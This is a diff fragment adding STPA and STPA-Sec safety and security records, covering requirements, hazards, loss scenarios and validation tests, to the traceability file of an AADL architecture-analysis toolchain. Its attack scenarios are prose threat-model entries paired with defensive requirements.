+        "resolution",
+        "stpa"
+      ],
+      "title": "Ambiguous name resolution warning",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA thread has Period => 20ms globally but Period => 5ms in mode\n\nHighRate. The scheduling analysis reads only the default period\n\n(20ms). In HighRate mode,\nthe actual period is 5ms,\ncausing 4x\n\nhigher CPU utilization. RMA reports the system is schedulable\n\nbecause it used the 20ms period.\n",
+      "id": "LS-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Modal property override not considered in analysis",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The source rewriter must identify target CST nodes using fully- qualified component paths (package::type.impl → subcomponent chain). Substring or partial name matching is prohibited. The rewriter must resolve the path through the salsa database (not by text search on the CST). When the path does not resolve to exactly one CST node, the rewriter must emit an error and skip the rewrite for that component.\n",
+      "id": "SOLVER-REQ-017",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "rewriter",
+        "targeting",
+        "stpa"
+      ],
+      "title": "Fully-qualified CST node targeting for rewrites",
+      "type": "requirement"
+    },
+    {
+      "description": "\nPorts must be rendered as visible elements on component\n\nboundaries with directional indicators (arrows for in/out/in-out)\n\nand type-based coloring (distinct colors for data,\nevent,\nevent\n\ndata,\nbus access,\netc.).\n",
+      "id": "RENDER-REQ-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [],
+      "title": "Visible ports with directional indicators",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "Verifies that parsing a clean AADL package with a system type produces no \"unhandled\" warnings. This validates that the explicit no-op arms correctly cover all non-semantic SyntaxKinds.\n",
+      "id": "VAL-002",
+      "links": [
+        {
+          "target": "STPA-REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No spurious unhandled warnings for known constructs",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-15",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SVG rendering misrepresents topology",
+      "type": "uca"
+    },
+    {
+      "description": "Verifies that opaque (unparsed) property values do not produce false positive type mismatch diagnostics.\n",
+      "id": "VAL-009",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Opaque values skip validation",
+      "type": "feature"
+    },
+    {
+      "description": "\nEdges must use orthogonal (rectilinear) routing to minimize\n\nvisual crossings. The routing algorithm must avoid overlapping\n\nedges and route around component obstacles.\n",
+      "id": "RENDER-REQ-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [],
+      "title": "Orthogonal edge routing",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Property inserted in wrong component scope",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Severity assignment must follow documented criteria",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Verifies that scheduling, latency, resource_budget, arinc653, binding_check, and binding_rules all import from property_accessors instead of defining private helpers.\n",
+      "id": "VAL-036",
+      "links": [
+        {
+          "target": "STPA-REQ-015",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Analyses use shared accessors (no duplicate parsing)",
+      "type": "feature"
+    },
+    {
+      "description": "Test all AADL syntax constructs parse correctly with error recovery.",
+      "id": "TEST-PARSER",
+      "links": [
+        {
+          "target": "ARCH-PARSER",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSER-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSE-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "The verus_verify and wasm_component Bazel rules must be refactored to use ctx.actions.run with explicit argument lists instead of ctx.actions.run_shell with format string interpolation. Source file paths must never be concatenated into shell command strings. If run_shell is unavoidable (e.g., for piping), all interpolated paths must be shell-quoted using shlex or equivalent escaping.\n",
+      "id": "STPA-SEC-REQ-007",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "build",
+        "bazel",
+        "stpa-sec"
+      ],
+      "title": "Bazel rules must use argument lists instead of shell interpolation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn adversary manipulates model properties (timing values,\n\ncomponent names,\nport configurations) such that the generated\n\nLean4 proofs and Kani harnesses verify successfully,\nbut the\n\nactual generated runtime code violates safety invariants. The\n\nformal verification artifacts provide false assurance that the\n\nsystem is safe.\n",
+      "id": "L-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification bypass — proofs pass but code is unsafe",
+      "type": "loss"
+    },
+    {
+      "description": "Internal HIR definitions: ItemTree (declarative model), instance model, resolver, standard properties. Not public API.\n",
+      "id": "ARCH-HIR-DEF",
+      "links": [
+        {
+          "target": "REQ-MODEL-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH4",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH8",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH11",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH14",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-hir-def",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Schedulability must be checked for every populated processor",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis produces false positive",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CA-SEC-LOWER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lower SysML v2 to AADL",
+      "type": "control-action"
+    },
+    {
+      "description": "\nAll serialized outputs (JSON,\nSVG,\ntext) must accurately represent\n\nthe internal computed model. Round-trip deserialization must produce\n\nequivalent data.\n",
+      "id": "SC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Output fidelity",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nFalse positive diagnostics cause engineers to redesign correct\n\narchitectures,\nwasting significant time and budget.\n",
+      "id": "L-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Excessive engineering rework",
+      "type": "loss"
+    },
+    {
+      "description": "\nThe solver's Layer 1 allocates a DAL-A flight control process and\n\na DAL-D cabin lighting process to the same processor to minimize\n\nhardware count. Layer 3's safety decomposition check sees that\n\nboth are on the same processor but only checks whether an ARINC 653\n\npartition schedule exists — it does not verify that the partition\n\nprovides adequate time and space isolation (health monitoring,\n\npartition-level restart). The partition schedule exists but has\n\nno HM table configured. A runaway in the lighting process corrupts\n\nthe flight control process's memory because health monitoring\n\nwas not configured to contain the fault.\n",
+      "id": "LS-S12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "DAL-A and DAL-D co-located without partition verification",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CTRL-CODEGEN",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Code Generator (spar-codegen)",
+      "type": "controller"
+    },
+    {
+      "description": "Modified expand_feature_group_connections to track which source features were matched to destination features. After the matching loop, unmatched source features produce diagnostics identifying the connection name and unmatched member name.\n",
+      "id": "ARCH-011",
+      "links": [
+        {
+          "target": "STPA-REQ-011",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Feature group unmatched member diagnostics",
+      "type": "design-decision"
+    },
+    {
+      "description": "When the parser encounters a token sequence that does not match any AADL v2.2 grammar production, it must emit an error diagnostic with the source location (file, offset). The parser must not silently skip tokens without producing a CST error node.\n",
+      "id": "STPA-REQ-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "parser",
+        "stpa"
+      ],
+      "title": "Unrecognized syntax must produce diagnostic",
+      "type": "requirement"
+    },
+    {
+      "description": "Layout computation (GraphLayout) is separated from rendering (SVG/HTML output). The layout phase produces abstract positions and routed edges; the render phase converts to visual output. This separation enables deterministic layout independent of rendering format.\n",
+      "id": "ARCH-R4",
+      "links": [
+        {
+          "target": "RENDER-REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "RENDER-REQ-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "GLSP-inspired separation",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that threads without Context_Switch_Time or Interrupt_Overhead trigger an advisory diagnostic.\n",
+      "id": "VAL-053",
+      "links": [
+        {
+          "target": "STPA-REQ-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Interrupt overhead advisory without properties",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver's resource budget tracking (memory,\nweight,\npower)\n\nuses incorrect values — missing a component's contribution,\n\ndouble-counting shared resources,\nor using wrong unit conversions.\n",
+      "id": "H-S10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Resource accounting error",
+      "type": "hazard"
+    },
+    {
+      "description": "16-crate Rust workspace implementing an AADL v2.2 toolchain with incremental computation (salsa), lossless syntax (rowan), and arena allocation (la-arena). Crates: parser, syntax, annex, base-db, hir-def, hir, analysis, transform, cli, wasm, render, solver, sysml2, verify-macros, verify, codegen.\n",
+      "id": "ARCH-SYS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Spar AADL Toolchain",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn attacker provides a SysML v2 model with 10,000 part defs,\n\neach containing 100 port defs,\nresulting in 1,000,000 features.\n\nThe codegen pipeline generates Rust files with 1,000,000-field\n\nstructs,\nWIT files with 1,000,000 functions,\nand Lean4 proofs\n\nwith 1,000,000 theorems. The output is hundreds of gigabytes.\n\nThe build system and verification tools cannot process this,\n\neffectively denying verification for the entire project.\n",
+      "id": "LS-SEC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: resource exhaustion via model complexity bomb",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Post-solve validation must ensure salsa cache coherence by either: (a) calling set_file_text for every modified file to invalidate affected queries, or (b) creating a new salsa database for the post-solve analysis. Option (a) is preferred for incremental efficiency. A test must verify that post-solve analysis reads rewritten property values (not stale pre-rewrite values) by checking that a solver-inserted binding property appears in the post-solve analysis output.\n",
+      "id": "SOLVER-REQ-027",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "validation",
+        "cache-coherence",
+        "stpa"
+      ],
+      "title": "Fresh salsa computation for post-solve validation",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that a thread with Period but no Deadline emits an info diagnostic about implicit deadline equaling period.\n",
+      "id": "VAL-043",
+      "links": [
+        {
+          "target": "STPA-REQ-026",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Missing Deadline property produces info",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-S19",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate not generated",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe AADL model has two subcomponents with similar names:\n\n\"flight_control\"\nand \"flight_controller\". The rewriter searches\n\nthe CST for \"flight_control\" and matches the first occurrence,\n\nwhich happens to be in a comment or in the wrong component\n\nimplementation. The Actual_Processor_Binding property is inserted\n\ninto the wrong scope. Post-rewrite analysis may not catch this\n\nif both subcomponents have the same type and the binding is valid\n\nfor both.\n",
+      "id": "LS-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewriter inserts binding on wrong subcomponent",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Bazel rules must not construct shell commands from paths",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The in-memory representation of the AADL architecture",
+      "id": "CP-MODEL",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Internal AADL Model (ItemTree + Instance)",
+      "type": "controlled-process"
+    },
+    {
+      "description": "",
+      "id": "UCA-16",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Diagnostic output suppresses errors",
+      "type": "uca"
+    },
+    {
+      "description": "Import Capella XMI models into AADL. Physical Architecture → system implementations, Functional Chains → end-to-end flows, Components → AADL components. Lighter than the N7 Space Capella-to-TASTE bridge (no Eclipse dependency).\n",
+      "id": "REQ-INTEROP-003",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "interop",
+        "capella",
+        "bridge",
+        "v050"
+      ],
+      "title": "Capella/ARCADIA to AADL bridge",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn attacker modifies an AADL model to set Compute_Execution_Time =>\n\n0 ps .. 1 ps for a thread that actually runs for 5ms. The codegen\n\npipeline generates a Kani harness with WCET_PS = 1 (1 picosecond)\n\nand PERIOD_PS = 10_000_000_000 (10ms). The harness\n\nverify_*_no_deadline_miss trivially passes:\nany wcet <= 1 is well\n\nwithin the 10ms deadline. The Lean4 proof similarly passes because\n\nthe utilization is 0.0000001%. Meanwhile,\nthe actual thread exceeds\n\nits real deadline. The generated verification evidence shows \"all\n\nproofs pass\" with no indication that the input values were anomalous.\n",
+      "id": "LS-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: timing property manipulation for proof bypass",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Verifies that an integer expression validates successfully against an AadlInteger property type definition.\n",
+      "id": "VAL-004",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Integer matches AadlInteger type",
+      "type": "feature"
+    },
+    {
+      "description": "When Layer 1 incrementally adds a process to a processor, it must re-run full RTA (not a quick utilization estimate) for the updated thread set on that processor before proceeding to the next allocation. The quick utilization test may be used as a pre-filter to reject obviously infeasible allocations, but the full RTA must confirm feasibility before the allocation is committed.\n",
+      "id": "SOLVER-REQ-005",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "scheduling",
+        "incremental",
+        "stpa"
+      ],
+      "title": "Schedulability re-check after every incremental allocation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nSpar should not report defects that do not exist. When uncertain,\n\nspar should clearly indicate the confidence level (info vs warning\n\nvs error severity).\n",
+      "id": "SC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Minimize false positives",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Read WAC composition files and generate AADL system implementations with subcomponents and connections.\n",
+      "id": "REQ-TRANSFORM-003",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "transform",
+        "wac"
+      ],
+      "title": "WAC composition to AADL",
+      "type": "requirement"
+    },
+    {
+      "description": "6 analysis checks for AI/ML components: inference deadline, fallback coverage/timing, OOD coverage, model deployment, redundancy.\n",
+      "id": "FEAT-AIML-001",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "analysis",
+        "ai-ml"
+      ],
+      "title": "AI/ML property set and analysis passes",
+      "type": "feature"
+    },
+    {
+      "description": "Bridge module mapping EMV2 composite error states to STPA hazards and propagation paths to loss scenarios. Enables safety analysis workflows spanning both EMV2 and STPA methodologies.\n",
+      "id": "ARCH-EMV2-STPA",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "safety"
+      ],
+      "title": "EMV2 fault tree to STPA hazard mapping",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CA-LOWER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lower CST to ItemTree",
+      "type": "control-action"
+    },
+    {
+      "description": "property_rules.rs validates property applicability and types. property_accessors.rs provides typed access with unit conversion.\n",
+      "id": "COVERAGE-CH11",
+      "links": [
+        {
+          "target": "REQ-PROP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.11: Properties — type validation and evaluation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe solver must not co-locate components of different safety levels\n\nunless the model explicitly specifies adequate fault containment\n\n(ARINC 653 partitioning,\nhealth monitoring,\netc.).\n",
+      "id": "SC-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Safety level separation must be enforced",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe solver produces a binding configuration that violates one or\n\nmore constraints (timing,\nresource,\nsafety) but reports it as\n\nfeasible. The constraint violation is not detected by the solver's\n\ninternal validation.\n",
+      "id": "H-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver marks infeasible binding as feasible",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-S15",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Optimality certificate must be independently verifiable",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The SysML v2 lower.rs currently has a silent wildcard `_ => {}` in lower_node that drops unrecognized SyntaxKind variants without diagnostic. The planned fix mirrors ARCH-003 (AADL lowering): replace the wildcard with explicit no-op arms for known non-semantic kinds (WHITESPACE, COMMENT, ERROR, SEMICOLON) and a catch-all that emits a warning diagnostic via the LoweringDiagnostic infrastructure.\n",
+      "id": "ARCH-026",
+      "links": [
+        {
+          "target": "STPA-REQ-032",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering diagnostic infrastructure (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Array expansion produces wrong count",
+      "type": "uca"
+    },
+    {
+      "description": "Six analysis modules for AI/ML component safety: inference deadline checking, fallback coverage, fallback timing, OOD coverage, model deployment validation, and redundancy verification. Each implements the Analysis trait and integrates with AnalysisRunner.\n",
+      "id": "ARCH-AIML",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "analysis",
+        "ai-ml"
+      ],
+      "title": "AI/ML analysis passes following ISO/PAS 8800",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-16",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Category inference must be validated against type definition",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Evaluate all property expression types: integer, real, string, boolean, enumeration, list, record, range, classifier, reference, computed values, unit literals.\n",
+      "id": "REQ-PROP-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "properties",
+        "as5506-ch11"
+      ],
+      "title": "Property expression evaluation",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-S20",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Numerical computation must use integer or bounded arithmetic",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance builder enters infinite recursion",
+      "type": "uca"
+    },
+    {
+      "description": "The parser test suite must contain at least one test for each AADL v2.2 grammar production rule (approximately 80 productions). Each test must verify that a valid input produces the expected CST structure and that an invalid input produces an error diagnostic.\n",
+      "id": "STPA-REQ-003",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "parser",
+        "testing",
+        "stpa"
+      ],
+      "title": "Parser coverage test for all AADL productions",
+      "type": "requirement"
+    },
+    {
+      "description": "16 tests covering reachability matrix computation (linear chains, cycles, multi-component), unreachable mode detection, dead transition detection, NuSMV export formatting, and Analysis trait integration.\n",
+      "id": "TEST-MODE-REACHABILITY",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Mode reachability analysis and NuSMV export tests",
+      "type": "feature"
+    },
+    {
+      "description": "New spar-sysml2 crate with hand-written recursive descent parser for KerML/SysML v2 textual notation. Same architecture as spar-parser: rowan lossless CST, error recovery, SyntaxKind enum (~200 variants). Covers core KerML + SysML v2 profile constructs.\n",
+      "id": "ARCH-SYSML2-002",
+      "links": [
+        {
+          "target": "REQ-SYSML2-PARSE",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INTEROP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "sysml2",
+        "parser",
+        "v040"
+      ],
+      "title": "Rowan-based KerML parser (spar-sysml2 crate)",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nProperty values from the AADL model (timing values,\ndispatch\n\nprotocols,\nclassifier references) are formatted directly into\n\ngenerated Rust constants,\nTOML values,\nand Lean4 literals via\n\nformat! macros. A crafted property value string could escape the\n\nexpected context and inject arbitrary code or configuration.\n",
+      "id": "H-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Property values injected into generated code without validation",
+      "type": "hazard"
+    },
+    {
+      "description": "Verifies that AnalysisRunner::register_all() registers exactly 21 analysis passes and that the count matches expectations.\n",
+      "id": "VAL-031",
+      "links": [
+        {
+          "target": "STPA-REQ-014",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-015",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "register_all registers all analyses",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that a linear (non-circular) hierarchy does not produce spurious circular containment diagnostics.\n",
+      "id": "VAL-021",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Non-circular model no extra diagnostics",
+      "type": "feature"
+    },
+    {
+      "description": "\nA developer generates code with `spar codegen`. The generated\n\nBUILD.bazel loads verus_verify rules. On first build,\nVerus is not\n\ninstalled and the rule fails. The developer installs Verus and runs\n\nthe build -- it succeeds and the proof log is cached. Later,\nthe\n\ndeveloper modifies generated source but Bazel's dependency tracking\n\ndoes not detect the change (e.g.,\nthe file is outside the sandbox).\n\nThe stale cached proof log is reused. The modified code is not\n\nre-verified but the build reports success.\n",
+      "id": "LS-12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verus not installed but BUILD succeeds from cache",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nGenerated BUILD.bazel files or Cargo.toml manifests contain\n\nreferences to attacker-controlled dependencies,\nrepositories,\n\nor toolchain paths. When the build system processes these files,\n\nit fetches and executes malicious code during compilation,\ninfecting\n\nthe build environment or the resulting artifacts.\n",
+      "id": "L-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Build pipeline compromise via generated Bazel rules",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verus rule passes shell-injectable paths",
+      "type": "uca"
+    },
+    {
+      "description": "Added resolve_classifier_with_diagnostics() to GlobalScope. It wraps the existing resolve_classifier() and additionally checks for ambiguity when an unqualified reference resolves via imports. It iterates all imported packages to count candidates.\n",
+      "id": "ARCH-006",
+      "links": [
+        {
+          "target": "STPA-REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "resolve_classifier_with_diagnostics for ambiguity detection",
+      "type": "design-decision"
+    },
+    {
+      "description": "The spar instance model (SystemInstance with its arena-allocated component, connection, and property data) serves as the single knowledge base for all queries, analysis, and MCP resources. The query language and MCP server access it through the existing HIR facade — no separate database or index is built.\n",
+      "id": "ARCH-KNOWLEDGE-001",
+      "links": [
+        {
+          "target": "REQ-QUERY-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MCP-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "architecture",
+        "knowledge",
+        "v040"
+      ],
+      "title": "Instance model is the knowledge base; query layer on top",
+      "type": "design-decision"
+    },
+    {
+      "description": "When annex library or annex subclause content cannot be parsed by the registered annex parser, spar must emit a warning diagnostic indicating which annex was not processed. The annex content must not be silently dropped.\n",
+      "id": "STPA-REQ-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "parser",
+        "annex",
+        "stpa"
+      ],
+      "title": "Annex content must produce diagnostic when unparseable",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn attacker crafts a SysML v2 part def for a security monitor\n\ncomponent. The part def body contains no action or state usages —\n\nonly port defs and attribute usages. The infer_category heuristic\n\nclassifies it as \"system\" (the default for parts without\n\nsoftware-like children). In AADL,\nsystem components have no\n\nscheduling constraints. The security monitor,\nwhich should run\n\nas a periodic thread within an ARINC 653 partition,\nis instead\n\nmodeled as a system with no dispatch loop. No scheduling analysis\n\nruns. No ARINC 653 partition check applies. The monitor can be\n\nstarved by other components.\n",
+      "id": "LS-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: SysML v2 category confusion for partition bypass",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "UCA-S12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Global validation not performed after layer composition",
+      "type": "uca"
+    },
+    {
+      "description": "\nSpar's analysis passes fail to detect a genuine architectural\n\ndefect in the AADL model (e.g.,\nschedulability violation,\n\nunconnected safety-critical port,\nsingle-point-of-failure path).\n",
+      "id": "H-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis produces false negative",
+      "type": "hazard"
+    },
+    {
+      "description": "When assigning connections to buses, the solver must track aggregate bandwidth utilization for each bus. After each connection assignment, the total data rate of all connections on the bus must be compared against the bus's Bandwidth_Capacity property. If aggregate utilization exceeds capacity, the assignment must be rejected. The bandwidth check must account for protocol overhead (framing, headers, retransmission).\n",
+      "id": "SOLVER-REQ-009",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "bus-binding",
+        "bandwidth",
+        "stpa"
+      ],
+      "title": "Aggregate bus bandwidth validation",
+      "type": "requirement"
+    },
+    {
+      "description": "All schedulability computations (utilization, response time, deadline comparison) must use integer arithmetic with picosecond precision. Floating-point arithmetic is prohibited for feasibility boundary comparisons. If floating-point is used internally (e.g., for LP relaxations), the final feasibility check must use conservative integer rounding (ceiling for utilization, floor for available time).\n",
+      "id": "SOLVER-REQ-001",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "scheduling",
+        "numeric",
+        "stpa"
+      ],
+      "title": "Integer arithmetic for schedulability computations",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA feature group FG contains ports A and B. A connection maps\n\nsub1.fg -> sub2.fg. During semantic connection tracing,\nthe\n\nalgorithm matches FG members by position instead of by name.\n\nIf sub1's FG has members [A,\nB]\nand sub2's has [B,\nA]\n(due to\n\ninverse_of),\nthe connections are crossed:\nsub1.fg.A connects\n\nto sub2.fg.B. Connectivity analysis passes because all ports\n\nare connected. But the actual data flow is wrong.\n",
+      "id": "LS-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Connection tracing follows wrong feature group member",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nThe solver selects a communication protocol for cross-processor\n\nconnections that has insufficient bandwidth,\nexcessive latency,\n\nor missing security properties for the data flows it carries.\n\nMessages are dropped,\ndelayed,\nor corrupted at runtime.\n",
+      "id": "L-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Communication failure in deployed system",
+      "type": "loss"
+    },
+    {
+      "description": "\nLayer 0 computes processor utilization as 0.9999999999997 using\n\ndouble-precision floating-point arithmetic. The true utilization\n\nis 1.0000000000003 (unschedulable). The comparison U <= 1.0\n\npasses due to rounding. The task set is accepted. At runtime,\n\nthe lowest-priority thread intermittently misses its deadline\n\nunder worst-case execution conditions. The intermittent failure\n\nis difficult to reproduce during testing but occurs under\n\nstress in the deployed system.\n",
+      "id": "LS-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Floating-point RTA accepts boundary-case task set",
+      "type": "loss-scenario"
+    },
+    {
